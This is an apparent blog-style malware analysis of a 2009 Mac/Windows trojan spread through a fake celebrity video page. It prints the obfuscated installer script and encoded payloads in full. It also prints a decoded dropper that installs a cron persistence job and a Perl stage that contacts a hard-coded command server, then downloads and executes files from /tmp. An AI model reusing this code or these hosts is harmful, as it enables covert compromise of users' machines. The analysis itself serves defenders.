Rixstep
 About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Home » Learning Curve » ACP Guru

The Multi-Platform Attack

And it targets Apple's OS X. Time for a heads-up.


Get It

Try It

Postulate you've just seen ITV's Lewis and you recognise an actress extra but you can't place her. Postulate you're more than one person interested in this known but anonymous extra. What do you do?

You start by going to a TV listing. You each take a few of the female names of the cast, select each in turn, and use the ACP Web Services to scoot off to Google Images.

Postulate further that in one of these search result pages a curious image pops up - that of a naked Jessica Alba. Now everybody in the room knows the photograph has to be a fake because Jessica Alba's never had her picture taken like that. But you know there are thousands of these 'fake' sites going and you presume this is again one of them. You gather round to check out how good the fakery's become.

And it's definitely better. The heads no longer look like they've been fastened onto headless torsos with duct tape. But what's the purpose? A site with a bunch of phony pics - that's it? Not quite.

At the bottom you see there are also two come-ons for video clips of a 'naked Jessica Alba'. These too must be fake - but come on! How can anybody fake an entire video clip? Out of curiosity - and perhaps a bit of sadism or call it a penchant for Schadenfreude - you click through.

And you were right: there's no way amateur Photoshoppers could fake an entire video clip. You come instead to a blank page that says only 'Free Video' at the top and contains a cousin of the common YouTube clip object. There's a big arrow to click in the middle so you click it. And whoops but there all of a sudden comes a download in Safari. It's a DMG.

23 items, 87657 bytes, 240 blocks, 22 bytes in extended attributes.

install.pkg/Contents
install.pkg/Contents/Archive
install.pkg/Contents/Archive.bom
install.pkg/Contents/Archive.pax.gz
install.pkg/Contents/Archive/AdobeFlash
install.pkg/Contents/Archive/Mozillaplug.plugin
install.pkg/Contents/Archive/Mozillaplug.plugin/Contents
install.pkg/Contents/Archive/Mozillaplug.plugin/Contents/Info.plist
install.pkg/Contents/Archive/Mozillaplug.plugin/Contents/MacOS
install.pkg/Contents/Archive/Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
install.pkg/Contents/Archive/Mozillaplug.plugin/Contents/Resources
install.pkg/Contents/Archive/Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
install.pkg/Contents/Archive/Mozillaplug.plugin/Contents/version.plist
install.pkg/Contents/Info.plist
install.pkg/Contents/PkgInfo
install.pkg/Contents/Resources
install.pkg/Contents/Resources/BundleVersions.plist
install.pkg/Contents/Resources/en.lproj
install.pkg/Contents/Resources/en.lproj/Description.plist
install.pkg/Contents/Resources/License
install.pkg/Contents/Resources/package_version
install.pkg/Contents/Resources/preinstall
install.pkg/Contents/Resources/preupgrade

A number of things might cross your mind. The first might be that it's a damned good thing someone finally realised you shouldn't have downloads opening automatically by default.

The second thing may not be as accessible. You may namely be wondering why anyone - any black hat - would assume the flies drawn to the web trap were running a system with a demographic of less than 10%.

But they weren't. They branch on what your browser tells them about your machine through the 'user-agent' field. It's easy to see what's going on by either fiddling with the field in Safari's 'Develop' menu or by using Spike.

Look at it with Safari's default user agent and you get this.

<body id="mainbody">
<div align="center">
<a href="http://redrunde.com/download/31347a714e773d3db4dcff1820090808/QuickTimeUpdate.dmg">
<img src="img/xxplayer.gif" border=0></a></div>
</body></html>

Put in any non-OS X user agent and you get this.

<body id="mainbody">
<div align="center">
<a href="http://sitespacesexe.com/flash-plugin.40009.exe">
<img src="img/xxplayer.gif" border=0></a></div>
</body></html>

Both these payloads have been known for some time. What's evidently not been recorded is how they're being combined in a single exploit. You can try a Linux user agent but you'll still get a Windows download. These sites distinguish victims on a 'OS X or else Windows' basis.

OS X is coming of age and so is the multi-platform trojan. And this one isn't a skiddie job like the earlier ones.

Note that this is a trojan and not an exploit of an endemic system weakness. To do its dirty this trojan will have to get authorisation to get to root. On Windows it can very well be another matter - it might sneak in without the user noticing what happened - but on OS X you'll at least get the popup from the system authorisation services. Should you choose to stupidly type in your password at that point...

Again: both these strains have been known for some time. Somebody has been putting a lot of time and trouble into making things work on OS X and now they've got a cross-platform attack.

The OS X version of the trojan comes as an Installer bundle. The bundle has three copies of the same deadly script in different places and with different names - all to make sure you get screwed one way or another. This in addition to the Installer bundle itself which plants an 'Internet plugin' on your system.

The script is very sophisticated and very devious. It's obfuscated and unravels itself in two stages. Were you to not mess with it you'd see nothing. Here's the script in its entirety.

#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/laxx/nigeb/' |
sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r |
uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7056/' |
sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
dne
`
*(79W]&<&
E17:H='(W<S-@H68H)78S178F%F"-EC)95D(&!F*J44,G@214%$*"%$8X0"*M
"93505D*U4%+T,44O@2-\@5,F`F0J02(`AB0!!&.B@"2J040PH03K0$14ER0M
-%B($146I(41H4S(XD5-B0U5O4$+!AB0!!&.B@"2P8"8"IB()Q"+35$+Q0#.M
9%C)@)D*51#5*T$-25%,X("*9-35T8D+$Q20H(40@AC(H@$,F`F0J0"5JH"1M
!!S*$1$5I,"+)YB,PH4,R4U-N0%4-EB0!!F"-AC(H@$,F`F0J02(H0C(9ER-M
B032S(24WX25@U4*"5$+I(".=!S,D8D*T`$2I,55SHR,XTU,PDT,H,#*1I03M
K02-DP"-@!5,3U4*J(#/<!C)@)D*D$"0H(40@A#)H(D-4!C4N034E$S0%1B-M
D@"2W($0"IB4U$3+C@B1*T$,T@R6Q(3)WX"5A`$*"%4+B04(`AB0!!&.D@B0M
J044ST"5Q@#,"%T+X,"/;53)5)B*E0%5I,43IXB,XDD"-!#)P<E+4%"0H(40M
@AC(H@$,F$B(H4$3!AB0!!&.D@B0R(34WX"54I"-B0"1J0$0-UR0!5B*UPS6M
Q($)"I03J02(`!C0IL3,C@"3Q42(RH"5AP#*"E$-Q(#.;1C(4=U*5U2/I,44M
`1C,HPT-R$U-N4%8-EB0%!6,CPS6*TT,PD$8X("*(!#)!!S+"E$)T(43N0#-M
TPU+D4C(J046@AB0!I3+C@S6R,3)UH2595#,3%5)O4#/<-C0T8D"-I"-`A5+M
#AD2S,"+*5#)0)E*$E".I,4/M(21I$3,SP$7J(#/7!31A(R+D037U,54NDB,M
XDD,D`V5N03,YH03M,42LHR(\D5-25U)N0%)1AB0))#+UP#7P,4-W\2)414*M
#55(L(#.)!#)P<E+41E*J040PL"1$!5+35T**TT*U@S6T,%)"I"1TT4-3U$+M
K0#."=#-5-3+4%#-P(53RT2-XT%-51D5N02,`1S09EB-BP27Q035VX")<UD"M
-EB4%Q#,C@26S`32L$C,XH5-45$8H4$3(!S0,QE*RPS5S44)E\R(1U",2%D+M
Q("*8%3-T8E+D@54U,54OH03P(#.8)3)P8E+%A24Q(53B,3)LT4-3%U,K4#3M
4ER01UB(%144Q,53UHB,\DD-2%D(J051`ER01U".C@26*TT,R4C)N4%-!EB0M
)U2,T@#7U421BH")A@"*35E+M4#.9A2-U(R+D033M,5-N0#-TPU+B4D(J0%5M
J0#)T8D"-I"-8A$*"%D.L4"/<-#5E0B+3!52I,5/P8S(HPT,6!61M,3,ADB(M
!Q"*TPS2T4$5&]"-DD4+35D+M4#.9I03S4%06Y"1I4#+#ET)K4#.+-#,)!&+M
C034I(%1"I2)P45-#ET(W4#.<%C)@)T+TD5)Q,44P(3-@YT,"1T5*TT+U`35M
Q,44@I2)\L%,D$C(J4"8-ER05)B-CPR3S,5)WX25H$4*RT4+B04*`AB49)B-M
CPR3U(21WXR4@ED"-UR4%5"*R0S2P8$87Y"1P@$,"U5/J("/9%C(U0R+D035M
I,4,H\R(\DU,%1T4J,%,5%S(LDD,TPB3U,2-VH03N0$5J`35593+ED$*T,%+M
)5C,LT5,T4E-N0"7-EB4%!6,CPS6J0$00]B4)Q"-35D+Q0#.<5C(4=D*T$".M
*T4,#%5-L,#/91C0D(D*D$"0H(40@AC(H@T,P@D2S4"++-35`94+4Q%3I(50M
^4C,L@4,51D5N4$*15S411B"-AC(H@$,F`F0J02(`AB0`IT,EPR2S(%0'U"5M
<Q4*2%D/U(#+(%35$9E+%A24U,54M("1Q`$*"%$8X("*(I03P8"8"IB()Q"*M
35E)Q(#.:1C4D(U*4!&7Q,43IHB,\T%-31B0J421UDB0!!&.B@"2P8"8"I")M
A@"-C@E2*T4,B@22R4",6Y"14I"-#1R1J0"*55S40ID,E`F3S,4-G\")YT3+M
#5$,Q(#/==S,P8T+E044Q,53UHB,\DD"-!#)P<E+2E$+P(50B4#)LP5,S4U-M
O0"6%EB0%QB*D@"7S`32DPR,X@%-D4C)J425`UR4)1".C@B7S031PH03K4$,M
55S0)-R-U@#5V040SPB4$%$+#5T,M0#/"-C($=E+U$2/P,43IH2-XL$-"1U5M
O0#7$1C0!UB(&5"3*(#.&5"3X84),AC0@95+#A#0[841'EC-HHB"@I09N1F"M
TE&>E!B)F`";R5&<@P'(G\R)21$1!!52D<R+R1&9A!7:O,W)@069S!"?@<R+M
UYV9OX6=R9V;E!7>T]R<G`"9E-'(\!R)O0V<B]R-W<S-O,W)@069S!"?@07=M
O1&=S]B=E1V+@\6+@4&9O-69D57=@P'(G\R+N\R<[0T+OLS+QPE,<9R+IPE;M
<IB+HP5*<Y"*<]R<[<4(OX&7O<"(D5V<@P'(RU"(LE68T!"?@07=O1&=S]B=M
E1V+@\6+@4&9O-69D57=@P'(G\R+N\R<[0T+OLS+QPE,<9R+IPE;<IB+HP5*M
<Y"*<]R<[<4(OX&7O<"(D5V<@P'(RU"(LE68T!"?@<R+B5V9IYV+R5V=O!79M
TE&:W]R<G`"9E-'(\!",D`",ST"(LE68TI0:FI`=SY6:NXV;R-&(M)'(@`"(M
*0W<NEF+N]F<C!B8A1G;O)W8@`"(@H`=SY6:NXV;R-&(^`B(Q8B/R`";L5G;M
O879D]B/Q`">V!B(<Q4265$)O@&=A!')BP%(J`B*@H"(U\B*@HB(@\&:C5&(M
@`"(*X69H1'([T%(B("(]T#(B0W<IA79D("(;!B9II`8,ED5%1"(P5F<GQ';M
M`B8A1G;O)W8@U#=SE&>EI@(SY62M<6=L!%(T5F;R5&=NET+Y)78R)6:,]B(M
]@&=A!G"B,68M5&;P!78BT#3)951*(2-T(C+V8C+S83,N,3,R(2/21$1!!52M
helloeverybody 666 laxx

The top part tells you this thing is going to unravel itself but it can't be easy to see what the results are without letting the thing run. Which you absolutely don't want to do. So you change a bit in the script part to neutralise it and capture the output.

if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/laxx/nigeb/' |
sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r | uudecode -o preupgrade-run,00.rtx |
sed 's/applemac/AdobeFlash/' | sed 's/bsd/7056/' >trojan-exposed,00.rtx && exit

Now you can run the script without risking anything and the 'tail -53' will do its magic. And this is what you'll get - another script. [There's no other output to preupgrade-run,00.rtx because the script isn't authorised.]

IPADDR="213.163.66.245"
EVIL="applemac"
path="/Library/Internet Plug-Ins"
exist=`crontab -l|grep $EVIL`
if [ "$exist" == "" ]; then
    echo "* */5 * * * \"$path/$EVIL\" vx 1>/dev/null 2>&1" > cron.inst
    crontab cron.inst
    rm cron.inst
fi
tail -30 $0 | sed 's/whitepower/nigeb/' | tail -r | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' |
uudecode -o /dev/stdout | tail -r | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' |
uudecode -o /dev/stdout | sed 's/7777/bsd/' | sed 's/typeofrun/gnu/' |
sed 's/ipaddr/'$IPADDR'/' | perl && exit
dne
`
*(69GEF;@8C-V`B8L%F8L%F82
L%F"-AB4D\4/WTB4K85*)MC0=!5.WD"3B<4-3EC,ADR,3AD6T857#IC5U0E+M
0E43^(#8$IS-@U%*&5$4X83,$I03\($*,EB)EX$/7U31\,$5"AR0,IR.W0$0M
I<2*5MS1QD%/F037]<210EC-=9$/'5C3N`%2JPS5U($*G$C4*TD.V0%2I("1M
JX#4(!$*B`&0H("8`AB)5E%*B$S4]<2*)MC1\`T+R$R4Z821&US(,I"*B`&0M
H("8`AB(@1D"-QS5Q(E.VDU1H,25>AR)L\T-G@R3K,%3J@B(@!$*B`&0H("8M
$QS5Q(E.VDU1H,25>AR)L\T-F@U3K,%3JH03H("8`AB(@!$*B$B4Y<3,5QC1M
8!4*GT"5\841.ES4,IR/P@D*[<#1`ER)M\$.6U41],25I,S4(I%-6UU0*TD.M
65#5N,42I,#1U0S*SDE3Y<#/(1C)U4$/$5"1Y<"*=]B0H0D.W`F0K42(%ES-M
I`S.7E"5O,#6"YR(@)D"-M2)A(U.7%S3O,#6"UC)M`%*"1$0[<%*`QC1U05/M
WDB3N`520QC1%Y4/B`&1\857#IC5U0%*BDR)Q4#,`I03K85+'IC,5)D.V@U3M
Y85-.ES-I$4/FTE4K<4(,A")!13-E`V3L(#60=S)IPS.$%T3\<%,:AB(HX4*M
F4$4*TT*"E"/\444.5S-M4$/"55(Y85-.US((!$*"E%5\841-IB)A4U.&523M
Y(#8-QC)@ET*"AR6I<2*5MS1QDE"-QC)TL5+3QS5M,%3"MR1Q(E.V0%2X820M
/QS5QX$.V451X("1.AR0-Q#/%%E3W<2*\LC0HLE(`ET5Z821,I03Y(#0<ER)M
M\$.6U41],"6)YC4@1$.VDU4]85-2MR041T-3U47B84+,MS5M4D*B$S4[85+M
+ES-PDD+0AD**TT.W0$0I82,!UC)DT%/75C0\<5,2IB(Q$T.'UR5Y<#*,IC-M
914.W`$2I82).QS5]4$/"!E0W<2*\L311)E"-=C)8)D*RP$5J,#3JHC-X@4*M
F4B3\<5/%QS05YU*5%32[8#-:AB(`YD*"5$/\444.MB4$IB/0A$0H("8`I03M
[<#1`EB)M`U.7Q27L(24@QC)=-U+WT"4[8214IB(<!T*2!%1L(#1;)B0@!$*M
B$B1[<5*%AC-M@D*D$"4*TT.7Q22B($8`AB(ALE("!&0H("8`AB(@!T.W0$0M
I82.)MC)TT%*"U%5[<#8/AB081T-3QD*B($8`AB(@!D"-AB(@!T.7%21[(40M
F(#-15R*B@B7H($6$EC1%Q4.R0T6B($8`AB(@!$*B`&0\<2*)MS1P`4,$5$+M
Q(3(3I03]83*3US)H@4*F$30]8"),EB)M`U.7Q"3I4"7)Y"4(!$*B`&0H("8M
`AB)MPT.7U21J02.I,#)TDD+0AD**T$*B`&0H("8`AB(A,D.F4U3Y("80UR4M
T4U*B`&1Y841,ES,,I"*B`&0H("8`AB(A,E/WT"5Y8#5(EB)YDD"!MC)TDD+M
0AD*H("8`AB(@!$*B`&1X<5(/QC4,U5*EPU6B($8`AB(ATE('1E**`F"EY&9M
afatsarhaj 777 whitepower

Note the 'signature' at the bottom of the binary data has changed. [Read the first part backwards.] The IP is in the same neighbourhood as the server that dished out the download. This IP block is often used for this trojan.

There's another blob to unravel with yet another script to neutralise first.

tail -30 $0 | sed 's/whitepower/nigeb/' | tail -r | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' |
uudecode -o /dev/stdout | tail -r | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' |
uudecode -o /dev/stdout | sed 's/7777/bsd/' | sed 's/typeofrun/gnu/' |
sed 's/ipaddr/'$IPADDR'/' >trojan-exposed,01.rtx && exit
dne
`
*(69GEF;@8C-V`B8L%F8L%F82
L%F"-AB4D\4/WTB4K85*)MC0=!5.WD"3B<4-3EC,ADR,3AD6T857#IC5U0E+M
0E43^(#8$IS-@U%*&5$4X83,$I03\($*,EB)EX$/7U31\,$5"AR0,IR.W0$0M
I<2*5MS1QD%/F037]<210EC-=9$/'5C3N`%2JPS5U($*G$C4*TD.V0%2I("1M
JX#4(!$*B`&0H("8`AB)5E%*B$S4]<2*)MC1\`T+R$R4Z821&US(,I"*B`&0M
H("8`AB(@1D"-QS5Q(E.VDU1H,25>AR)L\T-G@R3K,%3J@B(@!$*B`&0H("8M
$QS5Q(E.VDU1H,25>AR)L\T-F@U3K,%3JH03H("8`AB(@!$*B$B4Y<3,5QC1M
8!4*GT"5\841.ES4,IR/P@D*[<#1`ER)M\$.6U41],25I,S4(I%-6UU0*TD.M
65#5N,42I,#1U0S*SDE3Y<#/(1C)U4$/$5"1Y<"*=]B0H0D.W`F0K42(%ES-M
I`S.7E"5O,#6"YR(@)D"-M2)A(U.7%S3O,#6"UC)M`%*"1$0[<%*`QC1U05/M
WDB3N`520QC1%Y4/B`&1\857#IC5U0%*BDR)Q4#,`I03K85+'IC,5)D.V@U3M
Y85-.ES-I$4/FTE4K<4(,A")!13-E`V3L(#60=S)IPS.$%T3\<%,:AB(HX4*M
F4$4*TT*"E"/\444.5S-M4$/"55(Y85-.US((!$*"E%5\841-IB)A4U.&523M
Y(#8-QC)@ET*"AR6I<2*5MS1QDE"-QC)TL5+3QS5M,%3"MR1Q(E.V0%2X820M
/QS5QX$.V451X("1.AR0-Q#/%%E3W<2*\LC0HLE(`ET5Z821,I03Y(#0<ER)M
M\$.6U41],"6)YC4@1$.VDU4]85-2MR041T-3U47B84+,MS5M4D*B$S4[85+M
+ES-PDD+0AD**TT.W0$0I82,!UC)DT%/75C0\<5,2IB(Q$T.'UR5Y<#*,IC-M
914.W`$2I82).QS5]4$/"!E0W<2*\L311)E"-=C)8)D*RP$5J,#3JHC-X@4*M
F4B3\<5/%QS05YU*5%32[8#-:AB(`YD*"5$/\444.MB4$IB/0A$0H("8`I03M
[<#1`EB)M`U.7Q27L(24@QC)=-U+WT"4[8214IB(<!T*2!%1L(#1;)B0@!$*M
B$B1[<5*%AC-M@D*D$"4*TT.7Q22B($8`AB(ALE("!&0H("8`AB(@!T.W0$0M
I82.)MC)TT%*"U%5[<#8/AB081T-3QD*B($8`AB(@!D"-AB(@!T.7%21[(40M
F(#-15R*B@B7H($6$EC1%Q4.R0T6B($8`AB(@!$*B`&0\<2*)MS1P`4,$5$+M
Q(3(3I03]83*3US)H@4*F$30]8"),EB)M`U.7Q"3I4"7)Y"4(!$*B`&0H("8M
`AB)MPT.7U21J02.I,#)TDD+0AD**T$*B`&0H("8`AB(A,D.F4U3Y("80UR4M
T4U*B`&1Y841,ES,,I"*B`&0H("8`AB(A,E/WT"5Y8#5(EB)YDD"!MC)TDD+M
0AD*H("8`AB(@!$*B`&1X<5(/QC4,U5*EPU6B($8`AB(ATE('1E**`F"EY&9M
afatsarhaj 777 whitepower

And behold it's a perl script this time.

#!/usr/bin/perl
use IO::Socket;
my $ip="",$answer="";
my $runtype=gnu;

sub trim($)
{
        my $string = shift;
        $string =~ s/\r//;
        $string =~ s/\n//;
        return $string;
}

my $socket=IO::Socket::INET->new(PeerAddr=>"$ip",PeerPort=>"80",Proto=>"tcp") or return;
print $socket "GET /cgi-bin/generator.pl HTTP/1.0\r\nHost: ".$ip."\r\nUser-Agent:
    ".trim(`uname -p`).";$runtype;bsd;".trim(`hostname`).";\r\n\r\n";

while(<$socket>){ $answer.=$_;}
close($socket);

my $data=substr($answer,index($answer,"\r\n\r\n")+4);
if($answer=~/Time: (.*)\r\n/)
{
    my $cpos=0,@pos=split(/ /,$1);
    foreach(@pos)
    {
        my $file="/tmp/".$_;

        open(FILE,">".$file);
        print FILE substr($data,$cpos,$_);
        close(FILE);

        chmod 0755, $file;
        system($file);

        $cpos+=$_;
    }
}

The downloads deposit the files in /tmp and they're run from there. Now what could those files be about?

Unfortunately the IP doesn't like to respond much. But it's been reported they corrupt your DNS. See links below.

Go back for a moment to the first unraveled script and notice crontab is being called. Use 'crontab -l' to corroborate the script in fact placed an entry in there and then use 'crontab -r' to remove it.

[If you were dumb enough to authorise Installer then you'll need to run the above commands with sudo.]

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron.inst installed on Tue Aug 18 08:24:38 2009)
# (Cron version -- $FreeBSD: src/usr.sbin/cron/crontab/crontab.c,v 1.24 2006/09/03 17:52:19 ru Exp $)
* */5 * * * "/Library/Internet Plug-Ins/AdobeFlash" vx 1>/dev/null 2>&1

That 'AdobeFlash' is a copy of the first script. It's hidden inside the Internet plugin and called intermittently to make sure you keep downloading the latest malware.

But there's other good stuff in this download. An excerpt from the bundle's Info.plist.

<key>CFBundleGetInfoString</key>
<string>who cares</string>
<key>CFBundleIdentifier</key>
<string>MacCinema</string>
<key>IFPkgFlagAuthorizationAction</key>
<string>RootAuthorization</string>
<key>IFPkgFlagDefaultLocation</key>
<string>/Library/Internet Plug-Ins/</string>
<key>IFPkgFlagRelocatable</key>
<false/>

Or how about Description.plist?

<key>IFPkgDescriptionDescription</key>
<string>shutdafuckup</string>
<key>IFPkgDescriptionTitle</key>
<string>MacCinema</string>

There's even an authentic EULA inside.

LICENSE AGREEMENT !

YOU SHOULD CAREFULLY READ THE FOLLOWING TERMS AND CONDITIONS BEFORE USING THIS PRODUCT. IT CONTAINS SOFTWARE, THE USE OF WHICH IS LICENSED BY LICENSOR TO ITS CUSTOMERS FOR THEIR USE ONLY AS SET FORTH BELOW. IF YOU DO NOT AGREE TO THE TERMS AND CONDITIONS OF THIS AGREEMENT, DO NOT USE THE SOFTWARE. USING ANY PART OF THE SOFTWARE INDICATES THAT YOU ACCEPT THESE TERMS.

THE PRODUCT IS PROVIDED "AS IS". THERE ARE NO WARRANTIES UNDER THIS AGREEMENT, AND LICENSOR DISCLAIMS ANY IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR PARTICULAR PURPOSE.

GRANT OF LICENSE: Licensor grants to you this personal, limited, non-exclusive, non-transferable, non-assignable license solely to use in a single copy of the Licensed Works on a single computer for use by a single concurrent user only, and solely provided that you adhere to all of the terms and conditions of this Agreement. "Licensed Works" means computer software together with any related documentation (including design, systems and user) and other materials for use in connection with such computer software in this package. The foregoing is an express limited use license and not an assignment, sale, or other transfer of the Licensed Works or any Intellectual Property Rights (as defined below) of Licensor.

ASSENT: By opening the file package containing this software, you agree that this Agreement is a legally binding and valid contract, agree to abide by the intellectual property laws and all of the terms and conditions of this Agreement, and further agree to take all necessary steps to ensure that the terms and conditions of this Agreement are not violated by any person or entity under your control or in your service.

OWNERSHIP OF SOFTWARE: The Licensor and/or its affiliates or subsidiaries own certain rights that may exist from time to time in this or any other jurisdiction, whether foreign or domestic, under patent law, copyright law, publicity rights law, moral rights law, trade secret law, trademark law, unfair competition law or other similar protections, regardless of whether or not such rights or protections are registered or perfected (the "Intellectual Property Rights"), in the Licensed Works. ALL INTELLECTUAL PROPERTY RIGHTS IN AND TO THE LICENSED WORKS ARE AND SHALL REMAIN IN LICENSOR.

NO COMMERCIAL USE: This License Agreement grants you the right to use the software for personal use only. Commercial use of the software or of the work products resulting from its use is not permitted under this License Agreement.

RESTRICTIONS:

(a) You are expressly prohibited from copying, modifying, merging, selling, leasing, redistributing, assigning, or transferring in any matter, Licensed Works or any portion thereof.

(b) You may take a single copy of materials within the package or otherwise related to Licensed Works only as required for backup purposes.

(c) You are also expressly prohibited from reverse engineering, decompiling, translating, disassembling, deciphering, decrypting, or otherwise attempting to discover the source code of the Licensed Works as the Licensed Works contain proprietary material of Licensor. You may not otherwise modify, alter, adapt, port, or merge the Licensed Works.

(d) You may not remove, alter, deface, overprint or otherwise obscure Licensor patent, trademark, service mark or copyright notices.

(e) You agree that the Licensed Works will not be shipped, transferred or exported into any other country, or used in any manner prohibited by any government agency or any export laws, restrictions or regulations.

(f) You may not publish or distribute in any form of electronic or printed communication the materials within or otherwise related to Licensed Works, including but not limited to the object code, documentation, help files, examples, and benchmarks.

TERM: This Agreement is effective until terminated. You may terminate this Agreement at any time by uninstalling the Licensed Works and destroying all copies of the Licensed Works. Upon any termination, you agree to uninstall the Licensed Works and return or destroy all copies of the Licensed Works, any accompanying documentation, and all other associated materials.

SOFTWARE INSTALLATION: Components bundled with our software may report to Licensor and/or its affiliates the installation status of certain marketing offers, such as toolbars, and also generalized installation information, such as language preference and operating system version, to assist Licensor in its product development. No personal information will be communicated to Licensor or its affiliates during this process. Licensor reserves the right to install additional components through its check/update system. These components could include Toolbar, Pop-up advertising solution, Commercial homepage manager, Commercial messenger and could modify some of your network settings.

WARRANTIES AND DISCLAIMER: EXCEPT AS EXPRESSLY PROVIDED OTHERWISE IN A WRITTEN AGREEMENT BETWEEN LICENSOR AND YOU, THE LICENSED WORKS ARE NOW PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, OR THE WARRANTY OF NON-INFRINGEMENT. WITHOUT LIMITING THE FOREGOING, LICENSOR MAKES NO WARRANTY THAT (i) THE LICENSED WORKS WILL MEET YOUR REQUIREMENTS, (ii) THE USE OF THE LICENSED WORKS WILL BE UNINTERRUPTED, TIMELY, SECURE, OR ERROR-FREE, (iii) THE RESULTS THAT MAY BE OBTAINED FROM THE USE OF THE LICENSED WORKS WILL BE ACCURATE OR RELIABLE, (iv) THE QUALITY OF THE LICENSED WORKS WILL MEET YOUR EXPECTATIONS, (v) ANY ERRORS IN THE LICENSED WORKS WILL BE CORRECTED, AND/OR (vi) YOU MAY USE, PRACTICE, EXECUTE, OR ACCESS THE LICENSED WORKS WITHOUT VIOLATING THE INTELLECTUAL PROPERTY RIGHTS OF OTHERS. SOME STATES OR JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF IMPLIED WARRANTIES OR LIMITATIONS ON HOW LONG AN IMPLIED WARRANTY MAY LAST, SO THE ABOVE LIMITATIONS MAY NOT APPLY TO YOU. IF CALIFORNIA LAW IS NOT HELD TO APPLY TO THIS AGREEMENT FOR ANY REASON, THEN IN JURISDICTIONS WHERE WARRANTIES, GUARANTEES, REPRESENTATIONS, AND/OR CONDITIONS OF ANY TYPE MAY NOT BE DISCLAIMED, ANY SUCH WARRANTY, GUARANTEE, REPRESENATION AND/OR WARRANTY IS: (1) HEREBY LIMITED TO THE PERIOD OF EITHER (A) THIRTY (30) DAYS FROM THE DATE OF OPENING THE PACKAGE CONTAINING THE LICENSED WORKS OR (B) THE SHORTEST PERIOD ALLOWED BY LAW IN THE APPLICABLE JURISDICTION IF A THIRTY (30) DAY LIMITATION WOULD BE UNENFORCEABLE; AND (2) LICENSOR'S SOLE LIABILITY FOR ANY BREACH OF ANY SUCH WARRANTY, GUARANTEE, REPRESENTATION, AND/OR CONDITION SHALL BE TO PROVIDE YOU WITH A NEW COPY OF THE LICENSED WORKS.

IN NO EVENT SHALL LICENSOR OR ITS SUPPLIERS BE LIABLE TO YOU OR ANY THIRD PARTY FOR ANY SPECIAL, INCIDENTAL, INDIRECT OR CONSEQUENTIAL DAMAGES OF ANY KIND, OR ANY DAMAGES WHATSOEVER, INCLUDING, WITHOUT LIMITATION, THOSE RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER OR NOT LICENSOR HAD BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES, AND ON ANY THEORY OF LIABILITY, ARISING OUT OF OR IN CONNECTION WITH THE USE OF THE LICENSED WORKS. SOME JURISDICTIONS PROHIBIT THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES, SO THE ABOVE LIMITATIONS MAY NOT APPLY TO YOU. THESE LIMITATIONS SHALL APPLY NOTWITHSTANDING ANY FAILURE OF ESSENTIAL PURPOSE OF ANY LIMITED REMEDY.

SEVERABILITY: In the event any provision of this License Agreement is found to be invalid, illegal or unenforceable, the validity, legality and enforceability of any of the remaining provisions shall not in any way be affected or impaired and a valid, legal and enforceable provision of similar intent and economic impact shall be substituted therefor.

ENTIRE AGREEMENT: This License Agreement sets forth the entire understanding and agreement between you and Licensor, supersedes all prior agreements, whether written or oral, with respect to the software, and may be amended only in a writing signed by both parties.

Tracking down the culprits from the IPs would be difficult. The more one digs the more on realises there's no single spider running this flytrap. There are parts of the web in the US, parts in the Ukraine and Bulgaria, parts in Russia, and parts - really important parts - in Coventry in the UK. They might not all be the best of friends but they've figured out how to work together.

The Takeaway

You don't have to get whacked by this type of trojan if you're running OS X. Not even if you really believe Jessica Alba did a naked photo shoot and those obscure sites seem to be the only places to have the pics.

But you should sit up and take notice about what's going down here. For this is a cross-platform exploit. And it's not written in SWF or something like that. It has real binaries for OS X and non-OS X.

The people putting this trojan out are intimately acquainted with both Windows and OS X and they've found it in their best interests to cover OS X too.

Count on the usual number of idiots falling for this trick just as they did with the earlier Installer trojans. But the MO in this case is a lot more sophisticated and probably will only get more so over time. And count on the black hats finding new and better ways to trick you in the future.

You can always say OS X is secure. And you might get people at this site to agree with you. You can always say there's no tangible danger if you're careful. And you again might get people at this site to agree with you.

But keep one thing in mind: organised crime online won't necessarily agree. The very fact they're now investing time in less than trivial exploits means they're interested in the platform. So be on your guard. Be careful.

Never give your admin password to anyone or anything unless you know exactly who's asking and why it's needed. Always sandbox (and closely monitor) unknown software.

And if you really want to see Jessica Alba doing something with less than full threads then watch a clip that at least qualifies in some circles as real drama. She seems to be using a body double but what do you care?

PS. The actress was Emily Beecham and it turns out no one knew her anyway.

PPS. The security cottage industry players (mostly on the Windows side of course) are calling the OS X variant 'OSX/Jahlav' amongst other things. And they're claiming it's 'successfully penetrated' the system. Don't believe it. The day OS X causes even a fraction of a percent of the damage a Windows outbreak causes - then you can talk about 'success'.

See Also
Threat Researcher: MacCinema
Google Web Search: OSX/Jahlav
Google Web Search: MacCinema
Threat Researcher: MacCinema Update
Google Web Search: QuickTimeUpdate.dmg
Google Web Search: flash-plugin.40009.exe
Threat Researcher: How to Remove MacAccess Trojan

About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Copyright © Rixstep. All rights reserved.